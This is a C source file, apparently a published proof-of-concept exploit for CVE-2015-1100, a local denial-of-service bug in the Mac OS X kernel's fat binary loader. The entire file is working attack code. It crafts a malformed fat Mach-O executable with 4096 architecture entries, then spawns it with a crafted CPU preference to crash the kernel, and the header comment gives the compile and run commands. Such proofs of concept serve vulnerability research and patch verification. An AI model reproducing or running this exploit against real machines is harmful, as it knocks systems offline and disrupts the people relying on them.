/*
 * 2015, Maxime Villard, CVE-2015-1100
 * Local DoS caused by a missing limit check in the fat loader of the Mac OS X
 * Kernel.
 *
 *  $ gcc -o Mac-OS-X_Fat-DoS Mac-OS-X_Fat-DoS.c
 *  $ ./Mac-OS-X_Fat-DoS BINARY-NAME
 *
 * Obtained from: http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.c
 * Analysis:      http://m00nbsd.net/garbage/Mac-OS-X_Fat-DoS.txt
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <spawn.h>
#include <unistd.h>
#include <err.h>
#include <mach-o/fat.h>
#include <sys/stat.h>

#define MAXNUM (4096)
#define MAXNUM0 (OSSwapBigToHostInt32(MAXNUM))

void CraftBinary(char *name)
{
 struct fat_header fat_header;
 struct fat_arch *arches;
 size_t i;
 int fd;

 memset(&fat_header, 0, sizeof(fat_header));
 fat_header.magic = FAT_MAGIC;
 fat_header.nfat_arch = 4096;

 if ((arches = calloc(MAXNUM0, sizeof(struct fat_arch))) == NULL)
  err(-1, "calloc");
 for (i = 0; i < MAXNUM0; i++)
  arches[i].cputype = CPU_TYPE_I386;

 if ((fd = open(name, O_CREAT|O_RDWR)) == -1)
  err(-1, "open");
 if (write(fd, &fat_header, sizeof(fat_header)) == -1)
  err(-1, "write");
 if (write(fd, arches, sizeof(struct fat_arch) * MAXNUM0) == -1)
  err(-1, "write");
 if (fchmod(fd, S_IXUSR) == -1)
  err(-1, "fchmod");
 close(fd);
 free(arches);
}

void SpawnBinary(char *name)
{
 cpu_type_t cpus[] = { CPU_TYPE_HPPA, 0 };
 char *argv[] = { "Crazy Horse", NULL };
 char *envp[] = { NULL };
 posix_spawnattr_t attr; 
 size_t set = 0;
 int ret;

 if (posix_spawnattr_init(&attr) == -1)
  err(-1, "posix_spawnattr_init");
 if (posix_spawnattr_setbinpref_np(&attr, 2, cpus, &set) == -1)
  err(-1, "posix_spawnattr_setbinpref_np");
 fprintf(stderr, "----------- Goodbye! -----------\n");
 ret = posix_spawn(NULL, name, NULL, &attr, argv, envp);
 fprintf(stderr, "Hum, still alive. You are lucky today! ret = %d\n", ret);
}

int main(int argc, char *argv[])
{
 if (argc != 2) {
  printf("Usage: %s BINARY-NAME\n", argv[0]);
 } else {
  CraftBinary(argv[1]);
  SpawnBinary(argv[1]);
 }
}